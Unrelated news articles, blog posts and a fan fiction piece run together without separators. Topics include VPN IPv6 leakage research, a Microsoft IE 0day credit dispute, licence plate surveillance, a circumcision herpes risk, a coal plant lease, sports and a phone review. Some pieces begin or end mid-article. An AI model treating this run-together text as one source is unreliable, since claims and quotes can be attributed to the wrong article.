McElwain did n't waste anytime in making Jordan feel comfortable as McElwain reassured Jordan of his place in the 2015 class .
“ Coach McElwain told me that I 'm still apart of the plan at Florida and that he wants me , ” Jordan said . “ He told me that they are going to try and build the class around me and that he wants me to be the leader of this class . ”
Jordan is one of only seven commits in this class but McElwain made sure to tell Jordan that he was going to get to work filling out this class .
“ Coach McElwain says he 's going to start building a great class and that he 's going to hit the ground recruiting in the morning , ” Jordan said . “ He said that he 's going to talk to the team on Monday morning and then get on the road . ”
During this process Jordan and former Gator commit George Brown were the top recruiters for this class and McElwain made sure to let Jordan know they needed help talking to all of these uncommitted prospects .
“ He talked to me a little bit about helping him recruit , ” Jordan said . “ I talked to him and Coach [ Drew ] Hughes about the guys that they want me to talk too . I talk to a lot of guys already . ”
Under Will Muschamp Jordan was solid to Florida and after Sunday 's visit to meet McElwain nothing has changed for Jordan .
“ I 'm very excited about the program and the chance to play for him now , ” Jordan said . “ I 'm solid to Florida and I do n't plan on taking any other visits to any other schools . I 'm planning on taking my official to Florida in January . ”
INSIDERS TAKE : Jordan was very excited about the chance to meet with Coach McElwain and he says that Coach did n't mention any of the assistant coaches to him today . Jordan will now take over the role as head recruiter in this class since George Brown decommitted .
Reuters Pictures Leaky VPNs are compromising users privacy
Fresh research has cast further doubt on the ability of virtual private networks ( VPNs ) to protect users ' privacy from intelligence agencies and criminal hackers .
VPNs are secure lines of communication that set up a private network between devices across public networks . They protect users ' privacy by setting up an encrypted tunnel between the device being used and the VPN provider 's servers when accessing online services , in theory making it more difficult for hackers to siphon or steal data mid-transit . You can download a VPN as a browser extension if you want to make it harder for others to see what you 're looking at on the web .
The research was published by Queen Mary University in London , in a paper titled “ A Glance Through the VPN Looking Glass : IPv6 Leakage and DNS Hijacking in Commercial VPN Clients . ”
The scientists examined the Hide My Arse , IPVanish , Astrill , ExpressVPN , StrongVPN , PureVPN , TorGuard , AirVPN , PrivateInternetAccess , VyprVPN , Tunnelbear , proXPN , Mullvad , and Hotspot Shield Elite services ' security .
Disturbingly , the researchers found that a staggering 11 out of the 14 VPNs are vulnerable to an “ IPv6 leakage issue . ”
IPv6 provides and manages the IP addresses devices used to connect to the internet . It 's the next generation replacement to IPv4 , but more robust . IPv6 was developed to allow more users and devices to communicate on the Internet using a number of under-the-hood changes , including the move to use longer IP addresses .
The leakage issue reportedly stems from the way the VPN 's handle Internet Protocol Version 6 ( IPv6 ) traffic . Specifically , the researchers claim the affected VPNs are only able to reliably deal with IPv4 traffic and can leave their users potentially unprotected when visiting sites running the newer IPv6 protocol .
The news is troubling as VPNs are commonly viewed as one of the best ways web users can protect their digital privacy and the use of IPv6 is becoming more widespread .
Controversial whistle blower Edward Snowden listed VPNs as a key way people can protect themselves from government surveillance , such as the NSA 's PRISM campaign , during a privacy discussion at the SXSW conference in Texas in March 2014 .
Cracking VPN defences has been an ongoing goal of numerous intelligence agencies , including the NSA and GCHQ , according to Snowden documents leaked to Der Spiegel .
Security firm Alienvault reported uncovering similar evidence the Chinese government is working to track VPN users in a JSONP hijacking report in June .
Queen Mary University scientists cited the research and attacks as proof web users need to stop looking for a “ silver bullet ” technology solution to their privacy concerns and adopt more robust defence strategies .
“ A common misconception is that the word ‘ private ' in the VPN initialism is related to the end-user 's privacy , rather than to the interconnection of private networks , ” read the report .
“ In reality , privacy and anonymity are features that are hard to obtain , requiring a careful mix of technologies and best practices that directly address a well-defined adversarial/threatmodel . In other words , there is no silver bullet within this domain . ”
NOW WATCH : The 12 best new features coming to the iPhone
Business Insider Emails & Alerts Site highlights each day to your inbox . Email Address Join
Follow Business Insider Australia on Facebook , Twitter , LinkedIn , and Instagram .
On the heels of the recently unveiled government programs to collect phone and internet records , the American Civil Liberties Union has unveiled another potential invasion of privacy involving automatic license plate readers .
The license plate readers , which are typically mounted on patrol cars or stationary objects like bridges , were initially used for law enforcement purposes such as acting on arrest warrants or finding stolen cars .
However , the ACLU claims that all of the data collected by the plate readers is increasingly being fed into massive databases that contain the location information of many millions of innocent Americans stretching back for months or even years .
The ACLU said it discovered the data collection after analyzing more than 26,000 pages of documents from police departments in cities and towns across the country .
Catherine Crump , a staff attorney with the ACLU , said , `` As it becomes increasingly clear that ours is an era of mass surveillance facilitated by ever cheaper and more powerful computing ( think about the NSA 's call logging program ) , it is critical we learn how this technology is being used . ''
`` License plate readers are just one example of a disturbing phenomenon : the government is increasingly using new technology to collect information about all of us , all the time , and to store it forever - providing a complete record of our lives for it to access at will , '' she added .
The ACLU noted that license plate reader information can be very revealing , offering a powerful tracking tool as the government stores data for longer and longer .
The technology could potentially track a person 's trips to places of worship , political protests , or gun ranges , providing powerful indicators of their beliefs .
`` Is it really the government 's how often you go to the drug store or liquor store , what doctors you visit , and the identities of your friends ? '' Crump asked .
`` I 'm sure all of us can remember something from our past that could embarrass us , '' she added . `` If the government comes to suspect you of something in 2020 , should it have access to databases stretching back years that could dig up facts about you that previously went unnoticed ? ''
For comments and feedback contact : editorial @ rttnews.com
Business News
CLOSE Male infants may be exposed each year to a deadly form of herpes from an ultra-Orthodox circumcision ritual that mandates rabbis use their mouths to suck blood from the fresh cut . Wochit
Potentially thousands of male newborns in Lakewood , N.J. , may be exposed annually to a deadly form of herpes from an ultra-Orthodox circumcision ritual . ( Photo11 : Asbury Park ( N.J. ) Press )
TRENTON , N.J. — Potentially thousands of male newborns in a New Jersey community may be exposed each year to a deadly form of herpes from an ultra-Orthodox circumcision ritual that mandates rabbis use their mouths to suck blood from the fresh cut .
But there is no safety protocol in place to assess and mitigate risks associated with the mouth-to-genital contact — despite four deaths statewide of infants between 1999 and 2015 where herpes simplex virus was found as an underlying cause , an Asbury Park Press investigation found .
The ritual is prevalent among the booming Orthodox population in Lakewood , N.J . There were 4,464 births to township women in 2015 — a birth rate that is four times higher than the state rate .
July 2017 : More couples face welfare fraud charges in New Jersey
New York , where officials have linked metzitzah b'peh ( sucking with the mouth ) circumcisions to at least 24 cases of infant herpes since 2000 , bans mohels from practicing , pending a herpes test , if they 're believed to be responsible for passing the disease to infants . New Jersey does n't have any similar rules .
A mohel , who is the rabbi performing the ritual , briefly places his mouth over the cut after removal of the foreskin of the penis and sucks out a small amount of blood , ceremonially purifying the area .
Medical experts say the procedure is risky because the oral contact puts babies at risk of getting harmful herpes simplex virus type 1 ( HSV-1 ) viruses .
Many adults carry HSV-1 in their bodies . They may have no symptoms or only mild symptoms , such as cold sores . Unlike adults , babies are too young to fight the virus — they could suffer brain damage , develop a lifelong disability or in some cases die .
Faith and medicine
Despite the risk — discovering neonatal herpes in males who undergo the ritual is 3.4 times more frequent than for other male babies , according to a federal study — metzitzah b'peh is another case of conflict between faith and safe medical practices .
The issue has prompted state Sen. Robert Singer , a Republican who lives in Lakewood , to consider legislation to test rabbis for herpes .
It might be impossible to establish a protocol governing oral suction circumcision , said Dr. Paul A. Offit , professor of pediatrics at the University of Pennsylvania Perelman School of Medicine . ( Photo11 : Provided by University of Pennsylvania Perelman School of Medicine via Asbury Park ( N.J. ) Press )
But there is no medical oversight in New Jersey , and leaders of Lakewood 's Orthodox community say they would consider restrictions on the centuries-old ritual as an infringement on religious freedom .
Lakewood is home to Beth Medrash Govoha , the largest Orthodox Jewish college or seminary in the U.S . The growth of the yeshiva over the years spurred a boost in the population , which went from 45,000 in 1990 to more than 100,000 now , making it New Jersey 's fifth-largest municipality .
Establishing a protocol governing oral suction circumcisions in Lakewood might be difficult if not impossible , said Dr. Paul Offit , a professor of vaccinology and pediatrics at the University of Pennsylvania School of Medicine , who said he 's in favor of banning the ritual entirely .
July 2017 : New Jersey welfare fraud arrests spark anti-Semitic sentiment
`` There 's a tangled relationship between religion and America , '' said Offit , author of Bad Faith : When Religious Belief Undermines Modern Medicine . ''
`` There 's a politically powerful Orthodox community in Lakewood that I 'm sure would push back against anything that would impact their freedom to have the ritual circumcisions , '' Offit said .
The Centers for Disease Control and Prevention in a 2012 report said circumcisions should be performed under sterile conditions , and direct oral contact should be avoided as much as possible .
While neonatal herpes is not among the diseases that needs to be reported to local health departments , the Asbury Park Press found the four instances in New Jersey by examining CDC death records . Nationally , there were 284 such deaths of infants between 1999 and 2015 .
New York 's example
New York City officials say of the 24 cases since 2000 of infant herpes they 've linked to metzitzah b'peh , two of those babies died and two more suffered brain damage . The city in March began barring mohels who test positive for herpes and who may have passed the virus to an infant .
'There has never been any correlation between ( the circumcisions ) to herpes here , '' said Rabbi Avi Schnall , director of the Agudath Israel of America 's New Jersey office . ( Photo11 : Asbury Park ( N.J. ) Press )
In Rockland County , N.Y. , where ultra-religious Jewish communities were established during the 1950s , health officials say they worked with Orthodox leaders to launch a protocol four years ago after seven cases of neonatal herpes emerged . DNA testing is used to try to link a baby with the source of infection .
There 's no need for New Jersey to follow suit , said Rabbi Avi Schnall , director of the Lakewood office of Agudath Israel of America , a non-profit that advocates for civil and religious rights for Jews .
`` There has never been any correlation between ( the circumcisions ) to herpes here , '' said Schnaal . `` There are some in the community who would not consider metzitzah b'peh a required part of the ceremony , but there are others who believe it 's an integral part , and the religious right of those people should be defended . ''
State officials would n't provide more information about the four infant deaths — such as locations , circumstances or genders — citing a law that limits public disclosure of vital records .
Singer said the investigation raises concerns about the dearth of reporting on neonatal herpes and the lack of oversight of mohels .
June 2017 : How did massive N.J. welfare fraud scheme work ?
`` Even if it 's just one case ( of neonatal herpes ) , we should know about it and where it 's coming from , '' Singer said . `` It should be a disease reportable to health departments . ''
Singer said he 's also interested in exploring whether it would be wise to have `` mohels tested maybe once a year . ''
“ Even if it 's just one case ( of neonatal herpes ) , we should know about it and where it 's coming from. ” New Jersey state Sen. Robert Singer
Schnall , from Agudath Israel of America , said testing mohels `` risks encroaching the separation of church and state . ''
In New York , former mayor Michael Bloomberg 's requirement for mohels to provide a health department pamphlet to parents describing the risks of HSV as well as obtain written consent acknowledging those risks , encroached on separation of church and state Schnaal said . Mayor Bill de Blasio removed the requirement when he took office in 2014 .
“ If the government wants to produce pamphlets or provide education on this , by all means . But to regulate the ritual and require of the parents or mohels that they need to do X , Y and Z , that 's different entirely , '' Schnall said .
The demand among Lakewood residents for the oral suction circumcision for their babies is high , said Dr. Jeffrey Mazlin , an ­OB-GYN and part-time mohel based in New York .
“ I know metzitzah b'pehis done by mohels a lot in Lakewood , '' said Mazlin , who does n't perform the procedure . “ My own thoughts are it 's potentially dangerous and the mohel has to make sure he does n't have any open sores if they 're performing it . ''
Several mohels who advertise their services in Lakewood declined to discuss how frequently they perform the ritual that 's said to be 4,000 years old .
June 2017 : 14 arrested in New Jersey welfare fraud investigation
`` My understanding is that it takes place with 90 % of the babies in Lakewood , '' Offit said .
Offit said state lawmakers should rally behind Singer to help improve tracking of neonatal herpes , which is also not a reportable disease nationally or in most states .
`` I think it 's really important to change the reporting . Children are being put at risk unnecessarily , '' Offit said . `` This is a time when it 's reasonable for the state to stand up and protect its children . ''
Like Offit , Rabbi Moshe Tendler , a professor of medical ethics at Yeshiva University , New York , said the ritual should be abandoned .
`` Oral suction of the incision is not required by halacha ( the collective body of Jewish religious laws ) , '' Tendler said from Israel in a telephone interview .
‘ 'The medical facts are not in dispute , not by anyone who has an understanding of infection and contamination , '' he said . `` Nowadays almost every mohel uses an ointment , a bacitracin , which most likely protects against most bacteria , but maybe some mohels do n't use it . In any case , it 's still unwise medically to do ( the ritual ) . ''
Follow Bob Jordan on Twitter : @ BobJordanAPP
Read or Share this story : https : //usat.ly/2whoNZ7
As you may know Microsoft has release MS12-063 out-of-band security bulletin , how fix 5 security vulnerabilities including CVE-2012-4969 , the Internet Explorer 0day I discovered exploited in the wild by the Nitro gang last weekend .
After analyzing MS12-063 and all the vulnerabilities fixed in this bulletin , I was surprised to see that CVE-2012-4969 was credited to an anonymous researcher , working with TippingPoint 's Zero Day Initiative .
Microsoft thanks the following for working with us to help protect customers : An anonymous researcher , working with TippingPoint 's Zero Day Initiative , for reporting the execCommand Use After Free Vulnerability ( CVE-2012-4969 )
So , to be clear , this means that this vulnerability was discovered by another researcher , previously to my discovery , reported to ZDI , which then reported it to Microsoft . Hum… Microsoft did n't yet provide the ZDI reference and ZDI also do n't have communicated around it .
Based on NIST NVD , CVE-2012-4969 , has a CVSS base score of 9.3 , cause “ AccessComplexity ” score is set to “ Medium “ . But really I think that the “ AccessComplexity ” should be set to “ Low ” how result then to a CVSS base score of 10 .
If you take a look at all Microsoft ZDI upcoming advisories , all related ZDI-CAN , reported by an anonymous researcher , have a maximum CVSS base score of 7.5 .
Here under all ZDI CAN 's , reported by an anonymous researcher :
ZDI-CAN-1586 was reported the 2012-07-24 , with CVSS of 7.5
ZDI-CAN-1574 was reported the 2012-07-24 , with CVSS of 7.5
ZDI-CAN-1373 was reported the 2012-07-24 , with CVSS of 7.5
ZDI-CAN-1526 was reported the 2012-03-14 , with CVSS of 7.5
ZDI-CAN-1525 was reported the 2012-03-14 , with CVSS of 7.5
ZDI-CAN-1524 was reported the 2012-03-14 , with CVSS of 7.5
ZDI-CAN-1523 was reported the 2012-03-14 , with CVSS of 7.5
ZDI-CAN-1520 was reported the 2012-03-14 , with CVSS of 7.5
ZDI-CAN-1402 was reported the 2011-11-29 , with CVSS of 7.5
ZDI-CAN-1281 was reported the 2011-05-25 , with CVSS of 7.5
None of these ZDI CAN vulnerabilities have a CVSS base score of 9.3 or 10 . But maybe ZDI does n't apply good practices to CVSS scoring ?
If you take a look at the MS12-063 CVE 's assignment , reported by anonymous researchers working with ZDI :
CVE-2012-4969 , the one , was assigned the 2012-09-18
CVE-2012-2557 was assigned the 2012-05-09
CVE-2012-1529 was assigned the 2012-03-08
If CVE-2012-4969 was reported to ZDI , by an anonymous researcher , the vulnerability was known by Microsoft since minimum 1 month , a maximum of 462 days , an average time of 168,4 days…
You may know that ZDI ( HP related company ) , is using the reported vulnerabilities , to create IPS filters in order to protect the HP Digital Vaccine customers . So despite the vulnerability affected vendor has not yet release a patch , HP Digital Vaccine customers are “ protected ” against the potential threat . So , all the potential 0days , reported to ZDI , are modeled as filters .
Our security research team develops new Digital Vaccine® protection filters that address the latest vulnerabilities and are constantly distributed to our customers ' intrusion prevention systems .
You may also know , that ZDI is a part of the zero day exploit market , and that the principal objective of this market is to do money by selling 0days to interested persons or organizations .
Now , just jump back at the end of August , you remember the Java 0day how was also exploited in the wild by the Nitro gang ? Take a look at the Oracle Security Alert for CVE-2012-4681 , how is credited ? James Forshaw ( tyranid ) via TippingPoint . Hum… One more time TippingPoint is present , coincidence ?
An interesting Guardian newspaper article , regarding the Java 0day , was pointing the possible fact that :
Although little is known about the group , it is thought that they did not discover the flaw themselves but may have bought it from a commercial group that specialises in selling details about “ zero-day ” flaws in software that can be used to penetrate commercial or government systems , even when they have the most up-to-date cybersecurity in place .
This begins to make to many coincidences , I would like to know if :
The Microsoft credit is an error ?
Has ZDI sold these 0days ?
Has HP Digital Vaccine filters been reversed ?
Is ZDI victim of a leak ?
Is ZDI victim of an internal threat ? Lot of ZDI employes have left the company recently .
Updates
09/22 :
Robert Graham @ ErrataRob has written an interesting article “ 0-day leaks from IPS ” regarding my question “ Have HP Digital Vaccine filters been reversed ? “ .
Nothing says romance like wine . In California and Illinois September is officially wine month . Wine celebrations , tours and events are going on everywhere . It is fitting . To me Autumn and wine go together , especially with a twist of romance thrown in . Maybe that 's why I got married in September . Love and romance is always swirling in the crisp Autumn air .
This weekend my husband and I will be celebrating our fifth wedding anniversary . How are we going to celebrate ? With some awesome Italian food and a little bit of wine . Ideally , I would love to take a wine tour of some of the vineyards and wineries around Michigan but I do n't know if we 'll have the time , or the babysitter .
I think we 'll wait until the following weekend ( which is my birthday , woo hoo free wine tasting ) and visit the grand opening of a new winery right in our area , Wolcott Winery , part of Wolcott Orchards . It 's not biodynamic or organic but it is local . Another fabulous addition to the many wineries in Michigan .
What you did n't know Michigan had vineyards ? Michigan has an extraordinary amount of vineyards and wineries for being such a cold state . Honestly I do n't know much about wine . I 'm not some wine connoisseur or snob , I just like what I like . Do n't ask me to pair up the right food with the right wine or even distinguish between dry and wet wines ( okay , maybe I can do that ) . Sometimes I buy wine solely based on what the bottle and label look like ( I 'm a sucker for aesthetics ) .
One thing I do regularly though , is buy wine from local Michigan wineries . St Julian 's is one of my favorites . It is the oldest and largest winery in Michigan , founded originally in 1921 by Mariano Meconi as Border City Wine Cellars . Several name changes later the winery found it 's current name of St. Julian Winery during World War II . It was named after the patron saint of Meconi 's village in Faleria , Italy . I would love to visit their main facility in Paw Paw , MI and go on the free tour and tasting . They even offer tasting for kids , since St Julian 's produces twice as much juice as they do wine .
Another Michigan brand I particularly enjoy is Leelanau Cellars . Their kitschy seasonal wine , Witch 's Brew ( which I originally purchased because of the cool label and name ) , is a fun treat for Halloween . A spicy blend best served warm , it has an interesting flavor .
I check out a lot of wine , my kitchen and dining room are both decorated with a wine theme , but I try to stick with local wines to support Michigan 's ever struggling economy . Michigan 's wine businesses created nearly $ 790 million worth of economic value to the State of Michigan in 2005 , they paid more than $ 42 million in state and local taxes in Michigan , and they support more than 5,000 jobs across the state , with a payroll of more than $ 190 million .
Those are all some very green reasons for me to check out what local wines have to offer . I 'm looking forward to trying out Wolcott Winery 's new selection .
What 's available in your area ? It is worth checking out .
Salt River Project , Arizona Public Service Co. , Tucson Electric Power and NV Energy have agreed to run the Navajo Generating Station through 2019 if the tribe approves a new lease by July 1 . ( Photo : Mark Henle/The Republic )
The Navajo Nation Council on Monday approved a new $ 350 million lease for the coal plant near Page that could allow it to remain open another two years .
Salt River Project , Arizona Public Service Co. , Tucson Electric Power and NV Energy agreed to run the Navajo Generating Station through 2019 if the tribe approved a new lease by July 1 . Otherwise , the utilities have said they will close the facility because it is more economical to buy power from natural-gas plants .
The tribe 's council passed amendments to the lease that SRP and the other owners now must negotiate .
SRP Deputy General Manager Mike Hummel said the utility is pleased with the vote .
“ This agreement provides meaningful benefits for all involved and creates a path forward during this challenging transition , '' he said in a prepared statement .
“ Importantly to us , the replacement lease paves the way for SRP employees at the plant to remain on the job for an additional two-plus years and allows us to fulfill our commitment to redeploying all regular NGS employees to other SRP facilities after 2019 should they so choose . ”
The coal plant and mine that supplies it employ about 750 people , nearly all members of the Navajo and Hopi tribes . The tribes both also benefit from coal sales from the mine and other economic activity associated with the operations .
The U.S. Bureau of Reclamation also owns a share of the plant and is striving , along with some tribal officials and Peabody Energy , to keep it open even beyond 2019 with new owners .
`` We 're encouraged by efforts to keep the Navajo Generating Station online and continue working with stakeholders toward a transition allowing operations well beyond 2019 , '' Peabody 's President of the Americas , Kemal Williamson , said in a prepared statement .
Peabody has hired research company Lazard to find a buyer for the plant .
`` Peabody has engaged a globally recognized research firm to evaluate the plant 's economic profile and initiated a process to identify a new ownership structure . We believe the plant will be competitive with natural gas and is essential for energy security , reliable water supplies and economic stability in the region , '' he said .
SRP has told Peabody and the tribe that if a new owner is to take over the plant , it must be identified by October so that a transition can be completed by 2019 .
At a May meeting with stakeholders , Lazard managing director Juan Correa had a heated exchange with Navajo leaders , who were disappointed that Lazard could not yet identify potential buyers . At the conclusion of the exchange , Correa fainted and was helped to a chair .
Environmental groups oppose efforts to keep the plant running and prefer to see a transition to solar and wind power as drivers of the regional economy .
“ Navajo leadership now have two and a half years to create a robust transition plan and can waste no time squandering on short sighted efforts to keep the plant running beyond 2019 or foolishly purchasing the Kayenta Mine , ” said Robyn Jackson , a member of the group Diné CARE .
The lease was a controversial subject for the tribe and council members . The final vote was 18-4 .
NEWSLETTERS Get the Business Morning News newsletter delivered to your inbox We 're sorry , but something went wrong The latest local and national business headlines , delivered in the morning . Please try again soon , or contact Customer Service at 1-800-332-6733 . Delivery : Mon-Fri Invalid email address Thank you ! You 're almost signed up for Business Morning News Keep an eye out for an email to confirm your newsletter registration . More newsletters
Protesters for and against the coal operations posted handmade signs outside the council chambers in Window Rock on Monday , according to photos shared with The Arizona Republic .
`` NGO ( s ) , U do n't support my family or pay my bills , '' read one pro-coal sign .
`` Drop coal like Cali , '' read an anti-coal sign , referring to California 's anti-coal rules .
Much of the debate among tribal council members was whether the Navajo Nation can take disputes with the lease to Navajo Court or whether potential disputes would be settled in state or federal court .
SRP leaders met early Monday to discuss the negotiations ahead of the tribe 's vote . Hummel told the elected officials at SRP that some of the proposed amendments are deal-breakers and that the plant will close this year if the tribe passes them .
In addition to the $ 110 million in continued lease payments through 2054 that would allow SRP to decommission the plant and monitor the site for several years , the new lease has several financial benefits for the tribe that are at risk if the lease is not passed .
The Navajo Nation has identified several pieces of the operation it wants to keep when the plant closes , including the railroad between the plant and the coal mine , valued at $ 120 million ; the lake pump facility and electrical switch yard , valued at $ 41 million ; and access to major transmission lines leading from the plant , which SRP values at about $ 80 million .
The transmission lines would allow the tribe to sell power from solar or wind plants .
READ MORE :
Coal train serving power plant derails near Page
Is a gondola ride in the Grand Canyon 's future ?
Navajo Nation seeks water , power infrastructure in lease
10 obstacles to keeping the Navajo coal plant open
Arizona coal mine , power plant lifeline for Hopi
Read or Share this story : http : //azc.cc/2tgMjUm
Paul Ryan ( CBS News )
The Democratic Congressional Campaign Committee mocked House Republicans for their “ spectacular ” failure to accomplish anything .
The DCCC described House Speaker Paul Ryan ( R-WI ) as unpopular and “ unfit to lead his unruly caucus , ” and the group faulted him for achieving “ almost nothing ” since Inauguration Day , reported The Hill .
“ After 100 days of unified control of Washington , there were already early signs of Speaker Ryan 's out-of-touch priorities and failed leadership , ” wrote Tyler Law , national press secretary for DCCC . “ At the time , the Speaker argued repeatedly that a 200-day evaluation was more appropriate . ”
Now that deadline has come and gone , and Democrats blasted Ryan and his party .
“ Let 's be very clear : the American people are better off for Speaker 's Ryan 's failed agenda , which is out to benefit the very rich and largest corporations , while devastating hardworking people 's healthcare , cost of living , jobs and wages , ” the memo says .
“ But , regardless of where one stands on the issues , the American people all share a desire for our government to execute their duties with competence at the bare minimum . And Republican voters have particularly high expectations . On this , the GOP has failed spectacularly . ”
The new Sprint HTC EVO sports some of the nicest hardware you can find on any mobile device on the market and boasts some of the burliest specs we 've ever seen in a phone ( 4G finally ! ) . What 's more , it 's just drop-dead gorgeous ; the kind of thing that compels others to ask about it when you take it out of your pocket .
So the EVO 's greatest draw is its 4G WiMax compatibility . How did it work ? Uh ... we do n't know . We tested the phone in San Francisco , which is not currently wired for 4G . If you 're considering the EVO for its data-processing chops , take a look at where 4G is currently deployed .
However , it did do far better with 3G than our iPhone . We took the phone to three different locations in San Francisco where AT & T has coverage holes , and in every case , had a 3G data connection ( sometimes slow ) while our iPhone would n't even make calls . While this may be less of an issue in areas where AT & T delivers the coverage it advertises , those who suffer its inadequate network will be happy to know there 's a robust alternative .
On the hardware front , the giant 4.3-inch display makes the iPhone and Nexus One feel dinky in comparison , yet it remains small and light enough to slip easily into a pocket . It flaunts an 8-megapixel camera ( with flash ) on the back , along with a 1.3-megapixel sensor adorning the front . This dual-screen action allows you to preview pics in order to take well-framed self portraits of yourself and your pals .
The camera also shoots 720p video — it wo n't replace your HD camcorder , but it 's a fantastic shooter to have in your pocket . A kickstand in the back lets you stand it up like a television , while an HDMI port lets you connect it to a TV . The 1-GHZ Snapdragon processor feels faster than the Indy 500 while the phone seemingly has more antennas than your average police car , with 3G , 4G ( WiMax ) , Bluetooth , Wi-Fi , FM and GPS connectivity .
All those antennas are put to good use . The navigation system is on par with or better than most standalone GPS units . Moreover , the phone feels designed for the internet from the get-go . On launch , it walks you through setting up your Google , Facebook , Twitter and other social media accounts . It imported our Facebook and Google contacts into the phone in seconds , and thanks to Google Voice integration , we were able to use an existing number . We also loved the ability to tether the phone . In just three clicks , you can set up a Wi-Fi connection to send internet to your computer .
Our only real hardware complaint is that the OLED display could bite brighter and crisper — it looks slightly fuzzy next to an iPhone — and we noticed some odd cyclical dimming effects when reading long blocks of text on web pages .
The overall interface is excellent , easily one of the most user-friendly of all the Android phones we 've laid hands on . When we handed the phone off to a user who had never before tried Android , she was immersed in seconds and able to do e-mail , surf the internet and tweet without instruction . It 's worth noting that the phone does not ship with the newly announced Froyo ( 2.2 ) version of Android , however HTC has announced that it intends to update phones released in 2010 with that version of the OS .
Our major quibble is that the battery on the EVO is shorter-lived than a plotline in a Seth MacFarlane show . A typical use situation gave us about 6 hours of battery life . After driving around town to test the GPS and 3G signals we ran out of juice in just over 4 hours . The situation was even worse when we flipped on the 4G antenna . In short , it wo n't make it through the day without a recharge . While the battery on the EVO is replaceable , so you can carry a spare , we look forward to a day when smartphone battery life is reasonably matched to power consumption .
Overall , we loved this phone . The hardware is smart and well-appointed , the interface is pleasant and straightforward , and it just plain worked . In short , it felt like a call from the future ; one not dropped by AT & T .
An MRI exam on Clippers guard Jamal Crawford 's strained left calf did not reveal any major structural damage .
He is day-to-day and could miss as many as 2-3 games . The Clippers ( 40-20 ) next play Saturday against the New Orleans Pelicans before facing the Phoenix Suns on Tuesday , Mar . 4 . He is hoping to return by the time the Clippers take on the Lakers Thursday , Mar . 6 .
Crawford sustained the injury with less than a minute remaining in the first half of Wednesday 's 101-93 victory over the Houston Rockets . He finished the game 2-for-10 from the field with eight points in 15:38 .
Since Jan. 17 , Crawford has averaged 23.4 points per game , including scoring 19 points or more 18 times . He closed out the Clippers ' recent three-game road trip with 36 points in Oklahoma City and 24 a night later in New Orleans .
and anybody notices that little reference I put in there :3
Sunburst : Okay , okay Sunburst . Just take a few deep breaths , it 'll all be over soon . Just do the technique Cadence showed you . Breath in , breathe out ......... nope does n't work.Shining : Sunburst just calm down.Sunburst : Calm dow- calm down ? ! ? ! How am I supposed to calm down when my wife is giving birth ? ! ? ! ? ! Shining : Come on , you know her as well as I do . Starlight is a strong mare , she 'll pull through this.Sunburst : ( sigh ) I know that but .... Shining : But ? Sunburst : I just hope nothing bad happens . I mean what if something happenes to Starlight ? What if something did n't go right ? What if something happens to the baby ? ! What if something happens to both of-Shining : Woah , woah , slow down Sunburst , you 're thinking WAY too deep into this.Sunburst : Well , I ca n't help it . All first time fathers go through this.Shining : Oh , come on man , I went through this with Flurry Heart and Maximus and I was n't as bad as you.Sunburst : Was n't as bad as me my flank , you were a train wreck ! Shining : Yes , I was a train wreck . You on the other hoof look like you 've just been chewed on and spat out by an Ursa Major.Sunburst : ( groans ) Shining : But seriously , just calm down , she 's going to be fine.Sunburst : You know what , you 're right , I just- I just need to sit down and breat-Starlight : AAAAAAAAAAAAAHHHHHHHHHHH ! ! ! ! ! ! ! ! Sunburst : ( sweating ) O-Okay Sunburst nothing to worry about ..... Shining : Uuh , Sunbur-Sunburst : But at the same time you still have A LOT to worry about ! Just keep breathing ! Shining : Sunburst ! Sunburst : Come on , just breathe . Breathe in , breathe out .......... WHY DOES THIS NEVER WOR- * SMACK * Shining : ..... Sunburst : ........ Did you just slap me ? Shining : I was calming you down.Sunburst : ...... WHY WOULD THAT CALM ME DOW- * SMACK * Sunburst : Would you PLEASE stop that ? ! ? ! ? ! ? Shining : Listen Sunburst , I know you 're worried , but you acting out is n't helping anypony . Starlight is going to be okay , and nothing is going to happen to that baby . You need to calm down . If not for yourself , then do it for Starlight and the foal.Sunburst : ..... ( sigh ) Y-yeah , yeah . Thanks Shining , you 're a good friend.Shining : ( smiles ) Hey , do n't mention it.Sunburst : Seriously though , you and Cadence have been there for me and Starlight ever since we told guys we were having a baby . You got us things for after the foal was born , you helped us make a nursery , you even came to a few of the doctor appointments , and we did n't even have to ask . Which is why me and Starlight have been wondering if you guys would like to be our foal 's god parents.Shining : Wait , are you serious ? Sunburst : Well yeah , we could n't think of a better pair of ponies than you guys.Shining : Wow , of course we , would love to be the god parents ! Sunburst : ( smiles ) I knew I could count on you both.Doctor : Mr. Sunburst ! Sunburst : Yes ? What is it ? Is she okay ? ! Doctor : Your wife and daughter are both perfectly fine.Sunburst : I-I ....... I have a-a filly ? Doctor : Yes , congratulations . You can come see them now.Sunburst : Shining , are you coming ? Shining : Not now , I want Cadence and the kids to be here when they see they 're new god daughter and sister . You go ahead and see your daughter.Sunburst : ( walks away ) Wow , I 'm ....... I 'm a dad.WOW , that was a lot to write ! This was some time before this : I think Shining would be like a brother to Sunburst and Starlight . And of coarse when Sunburst needed somepony to be there for him , Shining Armor will always be there to give him advice and a good smack to the face.And I am coming up with a little brother for Flurry Heart , and I HAD to name him after one of my favorite Disney horses.I hope you all enjoy
ES Football Newsletter Enter your email address Please enter an email address is invalid Fill out this field Email address is invalid You already have an account . Please log in or register with your social account
Manchester United boss Jose Mourinho says he is working hard to keep up with the modern game 's `` brats '' who lack the maturity of the likes of Chelsea legend Frank Lampard .
Mourinho manager Lampard during his two spells at Chelsea , with the midfielder winning every possible club trophy and going on to become the all-time top goalscorer at Stamford Bridge .
Lampard has since retired , while Mourinho took over at Old Trafford last summer having been sacked by Chelsea midway through the Blues ' disastrous 2015-16 Premier League title defence .
In an exclusive interview with France Football , translated by Get French Football , the Portuguese coach admits that while there are few young players left with the attitude and dedication of Lampard , now is not the time for managers to rely on methods of old .
Mourinho - who recently derided `` envious '' critics of United 's world-record £89million signing Paul Pogba - said : `` I had to adapt to a new world . To what young players are now .
`` I had to understand the difference between working with a boy like Frank Lampard , who , at the age of 23 was already a man , who thought football , work , professionalism , and the new boys who at the age of 23 are kids .
`` Today I call them 'boys ' not 'men ' . Because I think that they are brats and that everything that surrounds them does not help them in their life nor in my work .
`` I had to adjust to all that . 10 years ago , no player had a mobile phone in the dressing room . That is no longer the case .
`` But you have to go with it , because if you fight that , you are bringing about conflict and you put yourself in the stone age . ''
Pressed on the matter , Mourinho said : `` If you stop a player from doing something , even something a little stupid , on social media , you are going against nature .
`` I admit that having a son and a daughter at that sort of age has helped me to understand the way they function and what the world is today .
`` I measured , from a methodological point of view , the nature of change . I worked as a result with my assistants to better , modify and adapt our work .
